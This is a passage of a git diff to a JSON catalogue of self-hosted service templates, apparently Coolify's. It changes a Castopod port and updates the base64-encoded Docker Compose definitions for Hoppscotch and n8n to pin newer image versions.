J2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "podcast",
             "media",
@@ -503,7 +503,7 @@
         "category": "media",
         "logo": "svgs/castopod.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "8080"
     },
     "changedetection": {
         "documentation": "https://github.com/dgtlmoon/changedetection.io/?utm_source=coolify.io",
@@ -2030,7 +2030,7 @@
     "hoppscotch": {
         "documentation": "https://docs.hoppscotch.io?utm_source=coolify.io",
         "slogan": "The Open Source API Development Platform",
-        "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9IT1BQU0NPVENIXzgwCiAgICAgIC0gJ1ZJVEVfQUxMT1dFRF9BVVRIX1BST1ZJREVSUz0ke1ZJVEVfQUxMT1dFRF9BVVRIX1BST1ZJREVSUzotR09PR0xFLEdJVEhVQixNSUNST1NPRlQsRU1BSUx9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QGhvcHBzY290Y2gtZGI6NTQzMi8ke1BPU1RHUkVTX0RCfScKICAgICAgLSAnREFUQV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0X0RBVEFFTkNSWVBUSU9OS0VZfScKICAgICAgLSAnV0hJVEVMSVNURURfT1JJR0lOUz0ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfS9iYWNrZW5kLCR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9LCR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9L2FkbWluJwogICAgICAtICdNQUlMRVJfVVNFX0NVU1RPTV9DT05GSUdTPSR7TUFJTEVSX1VTRV9DVVNUT01fQ09ORklHUzotdHJ1ZX0nCiAgICAgIC0gJ1ZJVEVfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0nCiAgICAgIC0gJ1ZJVEVfU0hPUlRDT0RFX0JBU0VfVVJMPSR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9JwogICAgICAtICdWSVRFX0FETUlOX1VSTD0ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfS9hZG1pbicKICAgICAgLSAnVklURV9CQUNLRU5EX0dRTF9VUkw9JHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0vYmFja2VuZC9ncmFwaHFsJwogICAgICAtICdWSVRFX0JBQ0tFTkRfV1NfVVJMPXdzczovLyR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9L2JhY2tlbmQvZ3JhcGhxbCcKICAgICAgLSAnVklURV9CQUNLRU5EX0FQSV9VUkw9JHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0vYmFja2VuZC92MScKICAgICAgLSAnVklURV9BUFBfVE9TX0xJTks9aHR0cHM6Ly9kb2NzLmhvcHBzY290Y2guaW8vc3VwcG9ydC90ZXJtcycKICAgICAgLSAnVklURV9BUFBfUFJJVkFDWV9QT0xJQ1lfTElOSz1odHRwczovL2RvY3MuaG9wcHNjb3RjaC5pby9zdXBwb3J0L3ByaXZhY3knCiAgICAgIC0gRU5BQkxFX1NVQlBBVEhfQkFTRURfQUNDRVNTPXRydWUKICAgIGRlcGVuZHNfb246CiAgICAgIGRiLW1pZ3JhdGlvbjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfY29tcGxldGVkX3N1Y2Nlc3NmdWxseQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo4MC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBob3Bwc2NvdGNoLWRiOgogICAgaW1hZ2U6ICdwb3N0Z3JlczpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotaG9wcHNjb3RjaH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLWggbG9jYWxob3N0IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxMAogIGRiLW1pZ3JhdGlvbjoKICAgIGV4Y2x1ZGVfZnJvbV9oYzogdHJ1ZQogICAgaW1hZ2U6ICdob3Bwc2NvdGNoL2hvcHBzY290Y2g6bGF0ZXN0JwogICAgZGVwZW5kc19vbjoKICAgICAgaG9wcHNjb3RjaC1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgY29tbWFuZDogJ3BucHggcHJpc21hIG1pZ3JhdGUgZGVwbG95JwogICAgcmVzdGFydDogb24tZmFpbHVyZQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1ob3Bwc2NvdGNofScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9Jwo=",
+        "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOjIwMjYuMi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0hPUFBTQ09UQ0hfODAKICAgICAgLSAnVklURV9BTExPV0VEX0FVVEhfUFJPVklERVJTPSR7VklURV9BTExPV0VEX0FVVEhfUFJPVklERVJTOi1HT09HTEUsR0lUSFVCLE1JQ1JPU09GVCxFTUFJTH0nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREJ9JwogICAgICAtICdEQVRBX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfREFUQUVOQ1JZUFRJT05LRVl9JwogICAgICAtICdXSElURUxJU1RFRF9PUklHSU5TPSR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9L2JhY2tlbmQsJHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0sJHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0vYWRtaW4nCiAgICAgIC0gJ01BSUxFUl9VU0VfQ1VTVE9NX0NPTkZJR1M9JHtNQUlMRVJfVVNFX0NVU1RPTV9DT05GSUdTOi10cnVlfScKICAgICAgLSAnVklURV9CQVNFX1VSTD0ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfScKICAgICAgLSAnVklURV9TSE9SVENPREVfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0nCiAgICAgIC0gJ1ZJVEVfQURNSU5fVVJMPSR7U0VSVklDRV9GUUROX0hPUFBTQ09UQ0h9L2FkbWluJwogICAgICAtICdWSVRFX0JBQ0tFTkRfR1FMX1VSTD0ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfS9iYWNrZW5kL2dyYXBocWwnCiAgICAgIC0gJ1ZJVEVfQkFDS0VORF9XU19VUkw9d3NzOi8vJHtTRVJWSUNFX0ZRRE5fSE9QUFNDT1RDSH0vYmFja2VuZC9ncmFwaHFsJwogICAgICAtICdWSVRFX0JBQ0tFTkRfQVBJX1VSTD0ke1NFUlZJQ0VfRlFETl9IT1BQU0NPVENIfS9iYWNrZW5kL3YxJwogICAgICAtICdWSVRFX0FQUF9UT1NfTElOSz1odHRwczovL2RvY3MuaG9wcHNjb3RjaC5pby9zdXBwb3J0L3Rlcm1zJwogICAgICAtICdWSVRFX0FQUF9QUklWQUNZX1BPTElDWV9MSU5LPWh0dHBzOi8vZG9jcy5ob3Bwc2NvdGNoLmlvL3N1cHBvcnQvcHJpdmFjeScKICAgICAgLSBFTkFCTEVfU1VCUEFUSF9CQVNFRF9BQ0NFU1M9dHJ1ZQogICAgZGVwZW5kc19vbjoKICAgICAgZGItbWlncmF0aW9uOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9jb21wbGV0ZWRfc3VjY2Vzc2Z1bGx5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjgwLycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIGhvcHBzY290Y2gtZGI6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE1JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBkYi1taWdyYXRpb246CiAgICBleGNsdWRlX2Zyb21faGM6IHRydWUKICAgIGltYWdlOiAnaG9wcHNjb3RjaC9ob3Bwc2NvdGNoOjIwMjYuMi4xJwogICAgZGVwZW5kc19vbjoKICAgICAgaG9wcHNjb3RjaC1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgY29tbWFuZDogJ3BucHggcHJpc21hIG1pZ3JhdGUgZGVwbG95JwogICAgcmVzdGFydDogb24tZmFpbHVyZQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1ob3Bwc2NvdGNofScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AaG9wcHNjb3RjaC1kYjo1NDMyLyR7UE9TVEdSRVNfREI6LWhvcHBzY290Y2h9Jwo=",
         "tags": [
             "api",
             "development",
@@ -2884,7 +2884,7 @@
     "n8n-with-postgres-and-worker": {
         "documentation": "https://n8n.io?utm_source=coolify.io",
         "slogan": "n8n is an extendable workflow automation tool with queue mode and workers.",
-        "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX1BST1RPQ09MPSR7TjhOX1BST1RPQ09MOi1odHRwc30nCiAgICAgIC0gJ0dFTkVSSUNfVElNRVpPTkU9JHtHRU5FUklDX1RJTUVaT05FOi1VVEN9JwogICAgICAtICdUWj0ke1RaOi1VVEN9JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtIE44Tl9SVU5ORVJTX01PREU9ZXh0ZXJuYWwKICAgICAgLSAnTjhOX1JVTk5FUlNfQlJPS0VSX0xJU1RFTl9BRERSRVNTPSR7TjhOX1JVTk5FUlNfQlJPS0VSX0xJU1RFTl9BRERSRVNTOi0wLjAuMC4wfScKICAgICAgLSAnTjhOX1JVTk5FUlNfQlJPS0VSX1BPUlQ9JHtOOE5fUlVOTkVSU19CUk9LRVJfUE9SVDotNTY3OX0nCiAgICAgIC0gTjhOX1JVTk5FUlNfQVVUSF9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9OOE4KICAgICAgLSAnTjhOX05BVElWRV9QWVRIT05fUlVOTkVSPSR7TjhOX05BVElWRV9QWVRIT05fUlVOTkVSOi10cnVlfScKICAgICAgLSAnTjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZPSR7TjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZOi01fScKICAgICAgLSBPRkZMT0FEX01BTlVBTF9FWEVDVVRJT05TX1RPX1dPUktFUlM9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgICAgLSAnTjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSz0ke044Tl9TS0lQX0FVVEhfT05fT0FVVEhfQ0FMTEJBQ0s6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBuOG4td29ya2VyOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC4yJwogICAgY29tbWFuZDogd29ya2VyCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ1RaPSR7VFo6LVVUQ30nCiAgICAgIC0gREJfVFlQRT1wb3N0Z3Jlc2RiCiAgICAgIC0gJ0RCX1BPU1RHUkVTREJfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotbjhufScKICAgICAgLSBEQl9QT1NUR1JFU0RCX0hPU1Q9cG9zdGdyZXNxbAogICAgICAtIERCX1BPU1RHUkVTREJfUE9SVD01NDMyCiAgICAgIC0gREJfUE9TVEdSRVNEQl9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1NDSEVNQT1wdWJsaWMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gRVhFQ1VUSU9OU19NT0RFPXF1ZXVlCiAgICAgIC0gUVVFVUVfQlVMTF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gUVVFVUVfSEVBTFRIX0NIRUNLX0FDVElWRT10cnVlCiAgICAgIC0gJ044Tl9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfRU5DUllQVElPTn0nCiAgICAgIC0gTjhOX1JVTk5FUlNfRU5BQkxFRD10cnVlCiAgICAgIC0gTjhOX1JVTk5FUlNfTU9ERT1leHRlcm5hbAogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M9JHtOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M6LTAuMC4wLjB9JwogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfUE9SVD0ke044Tl9SVU5ORVJTX0JST0tFUl9QT1JUOi01Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI9JHtOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI6LXRydWV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgICAgLSAnTjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSz0ke044Tl9TS0lQX0FVVEhfT05fT0FVVEhfQ0FMTEJBQ0s6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC9oZWFsdGh6JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBuOG46CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHRhc2stcnVubmVyczoKICAgIGltYWdlOiAnbjhuaW8vcnVubmVyczoyLjEwLjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTjhOX1JVTk5FUlNfVEFTS19CUk9LRVJfVVJJPSR7TjhOX1JVTk5FUlNfVEFTS19CUk9LRVJfVVJJOi1odHRwOi8vbjhuLXdvcmtlcjo1Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fUlVOTkVSU19BVVRPX1NIVVRET1dOX1RJTUVPVVQ9JHtOOE5fUlVOTkVSU19BVVRPX1NIVVRET1dOX1RJTUVPVVQ6LTE1fScKICAgICAgLSAnTjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZPSR7TjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZOi01fScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gbjhuCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2ODAvJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX044Tl81Njc4CiAgICAgIC0gJ044Tl9FRElUT1JfQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnV0VCSE9PS19VUkw9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX0ZRRE5fTjhOfScKICAgICAgLSAnTjhOX1BST1RPQ09MPSR7TjhOX1BST1RPQ09MOi1odHRwc30nCiAgICAgIC0gJ0dFTkVSSUNfVElNRVpPTkU9JHtHRU5FUklDX1RJTUVaT05FOi1VVEN9JwogICAgICAtICdUWj0ke1RaOi1VVEN9JwogICAgICAtIERCX1RZUEU9cG9zdGdyZXNkYgogICAgICAtICdEQl9QT1NUR1JFU0RCX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICAgIC0gREJfUE9TVEdSRVNEQl9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BPUlQ9NTQzMgogICAgICAtIERCX1BPU1RHUkVTREJfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gREJfUE9TVEdSRVNEQl9TQ0hFTUE9cHVibGljCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIEVYRUNVVElPTlNfTU9ERT1xdWV1ZQogICAgICAtIFFVRVVFX0JVTExfUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFFVRVVFX0hFQUxUSF9DSEVDS19BQ1RJVkU9dHJ1ZQogICAgICAtICdOOE5fRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0VOQ1JZUFRJT059JwogICAgICAtIE44Tl9SVU5ORVJTX0VOQUJMRUQ9dHJ1ZQogICAgICAtIE44Tl9SVU5ORVJTX01PREU9ZXh0ZXJuYWwKICAgICAgLSAnTjhOX1JVTk5FUlNfQlJPS0VSX0xJU1RFTl9BRERSRVNTPSR7TjhOX1JVTk5FUlNfQlJPS0VSX0xJU1RFTl9BRERSRVNTOi0wLjAuMC4wfScKICAgICAgLSAnTjhOX1JVTk5FUlNfQlJPS0VSX1BPUlQ9JHtOOE5fUlVOTkVSU19CUk9LRVJfUE9SVDotNTY3OX0nCiAgICAgIC0gTjhOX1JVTk5FUlNfQVVUSF9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9OOE4KICAgICAgLSAnTjhOX05BVElWRV9QWVRIT05fUlVOTkVSPSR7TjhOX05BVElWRV9QWVRIT05fUlVOTkVSOi10cnVlfScKICAgICAgLSAnTjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZPSR7TjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZOi01fScKICAgICAgLSBPRkZMT0FEX01BTlVBTF9FWEVDVVRJT05TX1RPX1dPUktFUlM9dHJ1ZQogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgICAgLSAnTjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSz0ke044Tl9TS0lQX0FVVEhfT05fT0FVVEhfQ0FMTEJBQ0s6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0d